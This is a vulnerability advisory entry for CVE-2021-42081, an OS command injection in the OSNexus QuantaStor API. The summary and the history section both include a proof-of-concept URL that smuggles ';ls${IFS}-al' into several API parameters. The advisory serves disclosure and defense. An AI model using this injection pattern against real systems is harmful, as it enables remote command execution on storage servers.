CVE-2021-42081

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Configurations

Configuration 1 (hide)

cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*

History

22 Sep 2025, 07:15

Type Values Removed Values Added
Summary (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Information

Published : 2023-07-10 16:15

Updated : 2025-09-22 07:15


NVD link : CVE-2021-42081

Mitre link : CVE-2021-42081

CVE.ORG link : CVE-2021-42081


JSON object : View

Products Affected

osnexus

  • quantastor
CWE
CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')